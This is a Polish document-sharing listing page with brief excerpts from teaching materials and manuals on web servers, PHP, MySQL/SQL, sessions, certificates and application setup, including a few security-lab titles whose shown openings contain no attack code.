Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2 1. Instalacja serwera WWW Aby zainstalować serwer WWW w systemie Linux, należy wykorzystać menedżer pakietów apt-get. Polecenia które należy wpisać w terminalu użytkownika root 1 : apt-get install build-essential

Bardziej szczegółowo

Języki programowania wysokiego poziomu. Ćwiczenia

Języki programowania wysokiego poziomu. Ćwiczenia Języki programowania wysokiego poziomu Ćwiczenia Języki programowania Ćwiczenia Strukturalny HTML Arkusze CSS Formularze HTML i PHP Baza danych MySQL Forum internetowe Strukturalny HTML Zadania Dokument

Bardziej szczegółowo

Data modyfikacji: 2013-08-14

Data modyfikacji: 2013-08-14 Data modyfikacji: 2013-08-14 Co zawiera ten dokument: Ten dokument przedstawia, w jaki sposób zainstalować program Kancelaris PLUS 4 za pomocą standardowego instalatora na serwerze MySQL w wersji 5.0 i

Bardziej szczegółowo

Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi

Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi 1 Rozdział 1 Wprowadzenie do PHP i MySQL Opis: W tym rozdziale kursanci poznają szczegółową charakterystykę

Bardziej szczegółowo

mysql> UPDATE user SET Password=PASSWORD('pass') WHERE user='root'; Query OK, 2 rows affected (0.05 sec) Rows matched: 2 Changed: 2 Warnings: 0

mysql> UPDATE user SET Password=PASSWORD('pass') WHERE user='root'; Query OK, 2 rows affected (0.05 sec) Rows matched: 2 Changed: 2 Warnings: 0 Uprawnienia dla uż ytkowników MANIPULACJA UPRAWNIENIAMI Przechodzimy do cześci nadawania oraz odbierania uprawnie ń. Wszelkie zmiany dotyczące tabel w bazie mysql można przeprowadza ć za pomoc ą znanych

Bardziej szczegółowo

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL.

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Prezentacja Danych i Multimedia II r Socjologia Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Celem ćwiczeń jest poznanie zasad tworzenia baz danych i zastosowania komend SQL. Ćwiczenie I. Logowanie

Bardziej szczegółowo

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym 1 Wprowadzenie do środowiska Oracle APEX, obszary robocze, użytkownicy Wprowadzenie Plan Administracja obszarem roboczym 2 Wprowadzenie Co to jest APEX? Co to jest APEX? Architektura Środowisko Oracle

Bardziej szczegółowo

Należy ściągnąć oprogramowanie Apache na platformę

Należy ściągnąć oprogramowanie Apache na platformę Programowanie Internetowe Język PHP - wprowadzenie 1. Instalacja Oracle+Apache+PHP Instalacja Apache, PHP, Oracle Programy i ich lokalizacja Oracle Database 10g Express Edition10.2 http://www.oracle.com/technology/products/database/

Bardziej szczegółowo

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości część 3 przejdziemy teraz do zaprojektowania strony przegladaj_dzialami.aspx na której użytkownicy będą przeglądać

Bardziej szczegółowo

Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8

Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8 Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8 Bazowy skrypt PHP do ćwiczeń z bazą MySQL: Utwórz skrypt o nazwie cw7.php zawierający następującą treść (uzupełniając go o właściwą nazwę uŝytkownika

Bardziej szczegółowo

P o d s t a w y j ę z y k a S Q L

P o d s t a w y j ę z y k a S Q L P o d s t a w y j ę z y k a S Q L Adam Cakudis IFP UAM Użytkownicy System informatyczny Aplikacja Aplikacja Aplikacja System bazy danych System zarządzania baz ą danych Schemat Baza danych K o n c e p

Bardziej szczegółowo

Bezpieczeństwo Systemów Informacyjnych lab. 13

Bezpieczeństwo Systemów Informacyjnych lab. 13 Atak typu: zastrzyk SQL, metody obrony Wstęp Wielu początkujących programistów tworzących różne aplikacje webowe korzysta najczęściej takich technologii jak język PHP, serwer baza danych Mysql, Postgresql.

Bardziej szczegółowo

Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do

Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do Sesje i ciasteczka Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do śledzenia użytkownika podczas jednej sesji

Bardziej szczegółowo

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar)

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar) Tworzenie witryn internetowych PHP/Java (mgr inż. Marek Downar) Rodzaje zawartości Zawartość statyczna Treść statyczna (np. nagłówek, stopka) Layout, pliki multimedialne, obrazki, elementy typograficzne,

Bardziej szczegółowo

INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH

INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH Informatyka poziom rozszerzony Serwis WWW w projekcie edukacyjnym

Bardziej szczegółowo

Wysyłanie pliku na serwer. Plik na serwerze.

Wysyłanie pliku na serwer. Plik na serwerze. Wysyłanie pliku na serwer Dzięki PHP możemy w łatwy i przyjemny sposób obsłużyć pliki uploadowane na serwer. Jednak, by prawidłowo wysłać plik, niezbędny będzie odpowiedni formularz HTML. Poniżej przedstawię

Bardziej szczegółowo

Bazy Danych i Usługi Sieciowe

Bazy Danych i Usługi Sieciowe Bazy Danych i Usługi Sieciowe Język PHP Paweł Witkowski Wydział Matematyki, Informatyki i Mechaniki Jesień 2011 P. Witkowski (Wydział Matematyki, Informatyki i Mechaniki) BDiUS w. VIII Jesień 2011 1 /

Bardziej szczegółowo

INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII

INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII Wrocław 2006 INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII Paweł Skrobanek C-3, pok. 323 e-mail: pawel.skrobanek@pwr.wroc.pl INTERNETOWE BAZY DANYCH PLAN NA DZIŚ : Cookies Sesje Inne możliwości

Bardziej szczegółowo

Opis aktualizacji programu Kancelaria Komornika

Opis aktualizacji programu Kancelaria Komornika Opis aktualizacji programu Kancelaria Komornika ZUS-EKS Currenda sp. z o.o.; 30-348 K rakó w, ul. B o b rz y ńs ki e g o 3 9 b / 1 7 t el. (12) 3 5 8-01-3 1, (12) 359-78-98 f a x (1 2 ) 358-01-01 w. 6

Bardziej szczegółowo

SSI Web 8. (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety

SSI Web 8. (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety SSI Web 8 (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety Posiadaczem licencji na oprogramowanie SSI Web w Akademii Leona Koźmińskiego jest Centrum Psychologii Ekonomicznej i Badań

Bardziej szczegółowo

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji

Bardziej szczegółowo

Spis treści. 1. Konfiguracja systemu ewuś...3. 2. Logowanie się do systemu ewuś...6. 3. Korzystanie z systemu ewuś...6. 4. Weryfikacja cykliczna...

Spis treści. 1. Konfiguracja systemu ewuś...3. 2. Logowanie się do systemu ewuś...6. 3. Korzystanie z systemu ewuś...6. 4. Weryfikacja cykliczna... Centralny Ośrodek Informatyki Górnictwa S.A. KSOP Obsługa systemu ewuś Katowice, 2013 Spis treści 1. Konfiguracja systemu ewuś...3 2. Logowanie się do systemu ewuś...6 3. Korzystanie z systemu ewuś...6

Bardziej szczegółowo

Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca

Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca Uwierzytelnianie w PHP 01 Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca stron internetowych, jest identyfikacja i uwierzytelnienie uprzywilejowanego użytkownika. Od zaprojektowania

Bardziej szczegółowo

Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu.

Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu. Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu. Wykonanie: Radom Maj 2008 1 Serwis WWW szkoły w Internecie to obecnie najszybszy i najtańszy sposób dotarcia do największego kręgu

Bardziej szczegółowo

Podstawy programowania (PHP/Java)

Podstawy programowania (PHP/Java) Studia Podyplomowe Aplikacje i usługi internetowe Podstawy programowania (PHP/Java) Materiały pomocnicze do zajęć laboratoryjnych cz. II styczeń 2014 Opracował dr inż. Andrzej Jędruch 4. MySQL z poziomu

Bardziej szczegółowo

strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych z baz danych

strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych z baz danych SQL SQL (ang. Structured Query Language): strukturalny język zapytań używany do tworzenia strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych

Bardziej szczegółowo

TOPIT Załącznik nr 3 Programowanie aplikacji internetowych

TOPIT Załącznik nr 3 Programowanie aplikacji internetowych Szkolenie przeznaczone jest dla osób chcących poszerzyć swoje umiejętności o tworzenie rozwiązań internetowych w PHP. Zajęcia zostały przygotowane w taki sposób, aby po ich ukończeniu można było rozpocząć

Bardziej szczegółowo

Telesprzedaż by CTI Instrukcja

Telesprzedaż by CTI Instrukcja Telesprzedaż by CTI Instrukcja 1 Spis treści 1. Opis programu...4 2. Konfiguracja...5 2.1. Połączenie z serwerem MS SQL...6 2.2. Połączenie z serwerem MS SQL systemu Call Center...7 2.3. Nawiązanie połączenia

Bardziej szczegółowo

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze?

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze? Poradnik zetula.pl Jak założyć konto na zetula.pl i zabezpieczyć dane na swoim komputerze? 1.Wejdź na stronę www.zetula.pl 2.Kliknij na odnośniku Utwórz nowe konto 3.Wypełnij formularz rejestracyjny. Pola

Bardziej szczegółowo

BAZY DANYCH. Obsługa bazy z poziomu języka PHP. opracowanie: Michał Lech

BAZY DANYCH. Obsługa bazy z poziomu języka PHP. opracowanie: Michał Lech BAZY DANYCH Obsługa bazy z poziomu języka PHP opracowanie: Michał Lech Plan wykładu 1. PHP - co to jest? 2. Bazy danych obsługiwane przez PHP 3. Podstawowe polecenia 4. Sesje 5. Przykład - dodawanie towaru

Bardziej szczegółowo

Języki programowania wysokiego poziomu. Blog

Języki programowania wysokiego poziomu. Blog Języki programowania wysokiego poziomu Blog Elementy obowiązkowe (2p.) Wyświetlanie wpisów Logowanie/wylogowanie Dodawanie wpisów Elementy obowiązkowe (2p.) Wyświetlanie wpisów - wszystkie wpisy na jednej

Bardziej szczegółowo

Laboratorium nr 4. Temat: SQL część II. Polecenia DML

Laboratorium nr 4. Temat: SQL część II. Polecenia DML Laboratorium nr 4 Temat: SQL część II Polecenia DML DML DML (Data Manipulation Language) słuŝy do wykonywania operacji na danych do ich umieszczania w bazie, kasowania, przeglądania, zmiany. NajwaŜniejsze

Bardziej szczegółowo

Aplikacje www laboratorium

Aplikacje www laboratorium Aplikacje www laboratorium Konfigurowanie zabezpieczeń w oparciu o JAAS w serwerze GlassFish Zabezpieczanie aplikacji webowych z wykorzystaniem JASS jest w podstawowych zastosowaniach procesem dwuetapowym.

Bardziej szczegółowo

Pracownia internetowa w szkole ZASTOSOWANIA

Pracownia internetowa w szkole ZASTOSOWANIA NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje

Bardziej szczegółowo

Aspekty bezpieczeństwa aplikacji internetowych

Aspekty bezpieczeństwa aplikacji internetowych Aspekty bezpieczeństwa aplikacji internetowych Kamil Witecki (kamil@witecki.net.pl) Wojciech Wodo (wojciech.wodo@gmail.com) 21 kwietnia 2010 Kto, co, dlaczego? Popularne typy ataków Kim jesteśmy i dlaczego

Bardziej szczegółowo

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5 Wdrożenie modułu płatności eservice dla systemu Zen Cart 1.3.9 1.5 - dokumentacja techniczna Wer. 01 Warszawa, styczeń 2014 1 Spis treści: 1 Wstęp... 3 1.1 Przeznaczenie dokumentu... 3 1.2 Przygotowanie

Bardziej szczegółowo

Instrukcja użytkownika

Instrukcja użytkownika Instrukcja użytkownika w zakresie obsługi aplikacji internetowej KRAZ Rejestr Podmiotów Prowadzących Agencji Zatrudnienia Spis treści 1. Informacje wstępne... 3 2. Prowadzenie rejestru po zmianie ustawy...

Bardziej szczegółowo

Dlaczego PHP? - zalety

Dlaczego PHP? - zalety Dlaczego PHP? - zalety (+) bezpieczeństwo kodu - PHP wykonuje się po stronie serwera ( niezależność od przeglądarki) (+) bezpieczeństwo danych - wykorzystanie ssl i HTTPS (+) PHP jako moduł serwera WWW

Bardziej szczegółowo

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości Rozpoczniemy od zaprojektowania bazy danych w programie SYBASE/PowerDesigner umieszczamy dwie Encje (tabele) prawym

Bardziej szczegółowo

1. LOGOWANIE DO SYSTEMU

1. LOGOWANIE DO SYSTEMU 1. LOGOWANIE DO SYSTEMU Aby zalogować się do systemu należy do okna przeglądarki internetowej wpisać adres: mindstormlab.com/cms Należy upewnić się, że w pasku adresu przeglądarki po wprowadzeniu poprawnego

Bardziej szczegółowo

INSTRUKCJA UŻYTKOWNIKA Podpis cyfrowy ISO 9001:2008 Dokument: 2016.0.0.0 Wydanie: 2016-01. Podpis cyfrowy. Spis treści... 1

INSTRUKCJA UŻYTKOWNIKA Podpis cyfrowy ISO 9001:2008 Dokument: 2016.0.0.0 Wydanie: 2016-01. Podpis cyfrowy. Spis treści... 1 Spis treści Spis treści... 1 Wstęp... 2 Przygotowanie certyfikatów wewnętrznych... 2 2.1. Przygotowanie karty pracownika... 2 2.2. Dodawanie certyfikatu nadrzędnego... 3 2.3. Dodawanie certyfikatu pracownika...

Bardziej szczegółowo

Bazy danych w PHP dla początkujących

Bazy danych w PHP dla początkujących Instrukcja numer 05 Bazy danych w PHP dla początkujących Zaawansowane techniki tworzenie stron WWW Bazy danych w PHP dla początkujących Tworzenie bazy danych Krok 1 Należy połączyć się z serwerem MySQL

Bardziej szczegółowo

Bazy Danych. Ćwiczenie 1: Przygotowanie środowiska pracy dla bazy MySQL z wykorzystaniem XAMPP Portable Lite oraz MySQL-Front

Bazy Danych. Ćwiczenie 1: Przygotowanie środowiska pracy dla bazy MySQL z wykorzystaniem XAMPP Portable Lite oraz MySQL-Front Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Bazy Danych Ćwiczenie 1: Przygotowanie środowiska pracy dla bazy MySQL z wykorzystaniem XAMPP Portable Lite oraz MySQL-Front opracował:

Bardziej szczegółowo

Sieciowa instalacja Sekafi 3 SQL

Sieciowa instalacja Sekafi 3 SQL Sieciowa instalacja Sekafi 3 SQL Niniejsza instrukcja opisuje instalację Sekafi 3 SQL w wersji sieciowej, z zewnętrznym serwerem bazy danych. Jeśli wymagana jest praca jednostanowiskowa, należy postępować

Bardziej szczegółowo

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1 INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1 Producent: Lukaszjarosinski.com Nazwa oprogramowania: Websoft Site Analyzer 2.7.1 Wersja finalna: 28.02.2013 Kontakt: lukaszjarosinski@gmail.com,

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD3/11_06/Z Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 3 (PD3) Instalacja obsługi języka PHP na serwerze SBS2003 Język skryptowy PHP

Bardziej szczegółowo

SQL Server Configuration Manager centrum dowodzenia

SQL Server Configuration Manager centrum dowodzenia Instrukcja do przedmiotu Bazy danych laboratorium (zajęcia 1) 1 Celem pierwszych zajęć laboratoryjnych jest poznanie podstaw obsługi MS SQL Server 2005 za pomocą programu SQL Server Management Studio,

Bardziej szczegółowo

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT CEIDG MONITOR

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT CEIDG MONITOR INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT CEIDG MONITOR Producent: Nazwa oprogramowania: Printec Websoft CEIDG Monitor Aktualna wersja: 1.0 Ostatnia aktualizacja: 25.01.2015 Kontakt: biuro@e-printec.com.pl,

Bardziej szczegółowo

Języki programowania wysokiego poziomu. PHP cz.3. Formularze

Języki programowania wysokiego poziomu. PHP cz.3. Formularze Języki programowania wysokiego poziomu PHP cz.3. Formularze Formularze Sposób przesyłania danych formularza do serwera zależy od wybranej metody HTTP: Metoda GET

Bardziej szczegółowo

Instrukcja instalacji programu ARPunktor wraz z serwerem SQL 2005 Express

Instrukcja instalacji programu ARPunktor wraz z serwerem SQL 2005 Express Instrukcja instalacji programu ARPunktor wraz z serwerem SQL 2005 Express 1. Przygotowanie do instalacji W celu zainstalowania aplikacji należy ze strony internetowej pobrać następujący plik: http://in.take.pl/arpunktor/instalacja.zip.

Bardziej szczegółowo

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo

Certyfikat niekwalifikowany zaufany Certum Silver. Instalacja i użytkowanie pod Windows Vista. wersja 1.0 UNIZETO TECHNOLOGIES SA

Certyfikat niekwalifikowany zaufany Certum Silver. Instalacja i użytkowanie pod Windows Vista. wersja 1.0 UNIZETO TECHNOLOGIES SA Certyfikat niekwalifikowany zaufany Certum Silver Instalacja i użytkowanie pod Windows Vista wersja 1.0 Spis treści 1. POBRANIE CERTYFIKATU SILVER... 3 2. IMPORT CERTYFIKATU DO PROGRAMU POCZTA SYSTEMU

Bardziej szczegółowo

Języki programowania wysokiego poziomu. Forum

Języki programowania wysokiego poziomu. Forum Języki programowania wysokiego poziomu Forum Elementy obowiązkowe (2p.) Wyświetlanie wpisów Logowanie/wylogowanie Dodawanie wpisów Rejestracja użytkowników Elementy obowiązkowe (2p.) Wyświetlanie wpisów

Bardziej szczegółowo

IIIIIIIIIIIIIIIMMIMMIII

IIIIIIIIIIIIIIIMMIMMIII IIIIIIIIIIIIIIIMMIMMIII O programie Program Itelix itender Manager przeznaczony jest do zarządzania zapytaniami ofertowymi przesyłanymi za pomocą poczty elektronicznej przez firmy korzystające z systemu

Bardziej szczegółowo

emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce)

emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce) emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce) Zastosowanie Rozszerzenie to dedykowane jest sklepom internetowych zbudowanym w oparciu

Bardziej szczegółowo

0.1 Logowanie do serwisu

0.1 Logowanie do serwisu 0.1. LOGOWANIE DO SERWISU 1 0.1 Logowanie do serwisu Tematem przewodnim będzie stworzenie systemu logowania do strony. I to takiego systemu, który będzie łączył się z bazą danych MySQL. Jeśli zaś chodzi

Bardziej szczegółowo

Centrum Informacji Społeczno-Gospodarczej

Centrum Informacji Społeczno-Gospodarczej Instrukcja użytkownika w zakresie obsługi aplikacji internetowej KRAZ Rejestr Podmiotów Prowadzących Agencji Zatrudnienia Strona 2 1. Informacje wstępne W związku z nowelizacją Ustawy o Promocji Zatrudnienia

Bardziej szczegółowo

INSTRUKCJA INSTALACJI SYSTEMU

INSTRUKCJA INSTALACJI SYSTEMU Zarządzanie Procesami Informatycznymi Sp. z o.o. 54-204 Wrocław, ul. Legnicka 62 Tel. : ( 071 ) 354 88 88 Fax : ( 071 ) 354 88 99 E-mail : biuro@vilico.pl INSTRUKCJA INSTALACJI SYSTEMU Wersja 1.4-1 - Spis

Bardziej szczegółowo

Drobne błędy w portalach WWW

Drobne błędy w portalach WWW Drobne błędy w portalach WWW Borys Łącki http://www.logicaltrust.net XIX Górska Szkoła Informatyki / Szczyrk, 23-26.06.2008 r. LogicalTrust wyizolowany departament bezpieczeństwa IT Business Consulting

Bardziej szczegółowo

www.kwp.edu.pl Instrukcja obsługi/instalacji platformy Krok w Przedsiębiorczość Administrator platformy

www.kwp.edu.pl Instrukcja obsługi/instalacji platformy Krok w Przedsiębiorczość Administrator platformy www.kwp.edu.pl Instrukcja obsługi/instalacji platformy Krok w Przedsiębiorczość Administrator platformy Wersja: 4_23/07/2012 1 Spis treści 1. Wymagania... 3 2. Konfiguracja serwera... 3 3. Parametry konfiguracyjne

Bardziej szczegółowo

Współpraca z platformą Emp@tia. dokumentacja techniczna

Współpraca z platformą Emp@tia. dokumentacja techniczna Współpraca z platformą Emp@tia dokumentacja techniczna INFO-R Spółka Jawna - 2013 43-430 Pogórze, ul. Baziowa 29, tel. (33) 479 93 29, (33) 479 93 89 fax (33) 853 04 06 e-mail: admin@ops.strefa.pl Strona1

Bardziej szczegółowo

2010-11-22 PLAN WYKŁADU BAZY DANYCH PODSTAWOWE KWESTIE BEZPIECZEŃSTWA OGRANICZENIA DOSTĘPU DO DANYCH

2010-11-22 PLAN WYKŁADU BAZY DANYCH PODSTAWOWE KWESTIE BEZPIECZEŃSTWA OGRANICZENIA DOSTĘPU DO DANYCH PLAN WYKŁADU Bezpieczeństwo w języku SQL Użytkownicy Uprawnienia Role BAZY DANYCH Wykład 8 dr inż. Agnieszka Bołtuć OGRANICZENIA DOSTĘPU DO DANYCH Ograniczenie danych z tabeli dla określonego użytkownika

Bardziej szczegółowo

edistro.pl Spis treści

edistro.pl Spis treści Spis treści 1 Spis treści 1 Spis treści... 2 2 Obsługa systemu... 3 2.1 Wymagania... 3 2.2 Uzyskiwanie dostępu do edistro... 3 2.3 Sprawdzenie czy mam włączony JavaScript... 4 2.3.1 Internet Explorer...

Bardziej szczegółowo

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości część 2 Zaprojektowaliśmy stronę dodaj_dzial.aspx proszę jednak spróbować dodać nowy dział nie podając jego nazwy

Bardziej szczegółowo

Instrukcjaaktualizacji

Instrukcjaaktualizacji Instrukcja Instrukcjaaktualizacji aktualizacji oprogramowania oprogramowaniainpro InProBMS BMS SPIS TREŚCI 1. AKTUALIZACJA 3 1.1. ARCHIWIZACJA BAZY DANYCH...3 1.1.1. AUTOMATYCZNA...3 1.1.2. RĘCZNA...4

Bardziej szczegółowo

BACKUP BAZ DANYCH FIREBIRD

BACKUP BAZ DANYCH FIREBIRD BACKUP BAZ DANYCH FIREBIRD SPIS TREŚCI Informacje ogólne... 2 Tworzenie projektu... 2 Krok 1: Informacje podstawowe... 2 Krok 2: Dane... 3 Backup bazy umieszczonej na serwerze... 3 Bezpośredni backup pliku

Bardziej szczegółowo

Projektowanie systemów baz danych

Projektowanie systemów baz danych Projektowanie systemów baz danych Seweryn Dobrzelewski 4. Projektowanie DBMS 1 SQL SQL (ang. Structured Query Language) Język SQL jest strukturalnym językiem zapewniającym możliwość wydawania poleceń do

Bardziej szczegółowo

Instalacja systemu zarządzania treścią (CMS): Joomla

Instalacja systemu zarządzania treścią (CMS): Joomla Instalacja systemu zarządzania treścią (CMS): Joomla Na stronie http://www.cba.pl/ zarejestruj nowe konto klikając na przycisk:, następnie wybierz nazwę domeny (Rys. 1a) oraz wypełnij obowiązkowe pola

Bardziej szczegółowo